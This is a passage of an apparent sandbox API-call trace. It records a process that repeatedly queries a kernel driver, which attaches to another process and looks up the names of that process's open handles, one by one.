ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.479] PsAcquireProcessExitSynchronization () returned 0x0 [0223.479] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.479] ObReferenceObjectByHandle (in: Handle=0x1dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800381af20, HandleInformation=0x0) returned 0x0 [0223.479] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.479] PsReleaseProcessExitSynchronization () returned 0x2 [0223.479] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.479] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.479] ObfDereferenceObject (Object=0xfffffa800381af20) returned 0x12 [0223.479] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.479] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.479] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.479] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0223.479] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.479] PsAcquireProcessExitSynchronization () returned 0x0 [0223.479] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.479] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003819910, HandleInformation=0x0) returned 0x0 [0223.479] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.479] PsReleaseProcessExitSynchronization () returned 0x2 [0223.479] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.479] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.479] ObfDereferenceObject (Object=0xfffffa8003819910) returned 0x20 [0223.479] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.480] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.480] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.480] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0223.480] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.480] PsAcquireProcessExitSynchronization () returned 0x0 [0223.480] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.480] ObReferenceObjectByHandle (in: Handle=0x210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003815a70, HandleInformation=0x0) returned 0x0 [0223.480] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.480] PsReleaseProcessExitSynchronization () returned 0x2 [0223.480] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.480] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.480] ObfDereferenceObject (Object=0xfffffa8003815a70) returned 0x12 [0223.480] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.480] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.480] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.480] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0223.480] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.480] PsAcquireProcessExitSynchronization () returned 0x0 [0223.480] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.480] ObReferenceObjectByHandle (in: Handle=0x214, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800381c9c0, HandleInformation=0x0) returned 0x0 [0223.480] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.480] PsReleaseProcessExitSynchronization () returned 0x2 [0223.480] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.480] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.480] ObfDereferenceObject (Object=0xfffffa800381c9c0) returned 0x12 [0223.481] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.481] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.481] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.481] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x96, lpOverlapped=0x0) returned 1 [0223.481] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.481] PsAcquireProcessExitSynchronization () returned 0x0 [0223.481] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.481] ObReferenceObjectByHandle (in: Handle=0x218, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800381cd10, HandleInformation=0x0) returned 0x0 [0223.481] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.481] PsReleaseProcessExitSynchronization () returned 0x2 [0223.481] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.481] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.481] ObfDereferenceObject (Object=0xfffffa800381cd10) returned 0x12 [0223.481] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.481] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.481] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.481] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xaa, lpOverlapped=0x0) returned 1 [0223.481] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.481] PsAcquireProcessExitSynchronization () returned 0x0 [0223.481] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.481] ObReferenceObjectByHandle (in: Handle=0x21c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800abfcbe0, HandleInformation=0x0) returned 0x0 [0223.481] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.481] PsReleaseProcessExitSynchronization () returned 0x2 [0223.482] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.482] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.482] ObfDereferenceObject (Object=0xfffffa800abfcbe0) returned 0x12 [0223.482] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.482] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.482] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.482] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0223.482] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.482] PsAcquireProcessExitSynchronization () returned 0x0 [0223.482] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.482] ObReferenceObjectByHandle (in: Handle=0x224, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800381ddc0, HandleInformation=0x0) returned 0x0 [0223.482] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.482] PsReleaseProcessExitSynchronization () returned 0x2 [0223.482] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.482] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.482] ObfDereferenceObject (Object=0xfffffa800381ddc0) returned 0x12 [0223.482] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.482] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.482] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.482] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0223.482] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.482] PsAcquireProcessExitSynchronization () returned 0x0 [0223.482] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.482] ObReferenceObjectByHandle (in: Handle=0x228, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003820910, HandleInformation=0x0) returned 0x0 [0223.483] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.483] PsReleaseProcessExitSynchronization () returned 0x2 [0223.483] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.483] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.483] ObfDereferenceObject (Object=0xfffffa8003820910) returned 0x12 [0223.483] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.483] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.483] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.483] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0223.483] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.483] PsAcquireProcessExitSynchronization () returned 0x0 [0223.483] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.483] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800a783a30, HandleInformation=0x0) returned 0x0 [0223.483] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.483] PsReleaseProcessExitSynchronization () returned 0x2 [0223.483] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.484] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.484] ObfDereferenceObject (Object=0xfffffa800a783a30) returned 0x12 [0223.484] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.484] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.484] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.484] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0223.484] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.484] PsAcquireProcessExitSynchronization () returned 0x0 [0223.484] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.484] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0223.484] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.484] PsReleaseProcessExitSynchronization () returned 0x2 [0223.484] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.484] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.484] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0223.484] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.484] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.484] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.485] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0223.485] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.485] PsAcquireProcessExitSynchronization () returned 0x0 [0223.485] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.485] ObReferenceObjectByHandle (in: Handle=0x29c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0223.485] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.485] PsReleaseProcessExitSynchronization () returned 0x2 [0223.485] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.485] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.485] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0223.485] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.485] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.485] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.485] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x44, lpOverlapped=0x0) returned 1 [0223.485] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.485] PsAcquireProcessExitSynchronization () returned 0x0 [0223.485] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.485] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034382d0, HandleInformation=0x0) returned 0x0 [0223.485] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.485] PsReleaseProcessExitSynchronization () returned 0x2 [0223.485] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.485] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.486] ObfDereferenceObject (Object=0xfffffa80034382d0) returned 0x1 [0223.486] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.486] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.486] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.486] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x44, lpOverlapped=0x0) returned 1 [0223.486] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.486] PsAcquireProcessExitSynchronization () returned 0x0 [0223.486] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.486] ObReferenceObjectByHandle (in: Handle=0x2fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003840930, HandleInformation=0x0) returned 0x0 [0223.486] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.486] PsReleaseProcessExitSynchronization () returned 0x2 [0223.486] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.486] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.486] ObfDereferenceObject (Object=0xfffffa8003840930) returned 0x1 [0223.486] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.486] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.486] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.486] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x42, lpOverlapped=0x0) returned 1 [0223.486] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.486] PsAcquireProcessExitSynchronization () returned 0x0 [0223.486] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.486] ObReferenceObjectByHandle (in: Handle=0x314, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038568c0, HandleInformation=0x0) returned 0x0 [0223.486] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.486] PsReleaseProcessExitSynchronization () returned 0x2 [0223.487] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.487] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.487] ObfDereferenceObject (Object=0xfffffa80038568c0) returned 0x1 [0223.487] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.487] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.487] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.487] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x42, lpOverlapped=0x0) returned 1 [0223.487] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.487] PsAcquireProcessExitSynchronization () returned 0x0 [0223.487] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.487] ObReferenceObjectByHandle (in: Handle=0x318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800384cf20, HandleInformation=0x0) returned 0x0 [0223.487] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.487] PsReleaseProcessExitSynchronization () returned 0x2 [0223.487] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.487] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.487] ObfDereferenceObject (Object=0xfffffa800384cf20) returned 0x1 [0223.487] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.487] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.487] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.487] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0223.487] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.487] PsAcquireProcessExitSynchronization () returned 0x0 [0223.487] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.488] ObReferenceObjectByHandle (in: Handle=0x32c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c69080, HandleInformation=0x0) returned 0x0 [0223.488] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.488] PsReleaseProcessExitSynchronization () returned 0x2 [0223.488] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.488] ObQueryNameString (in: 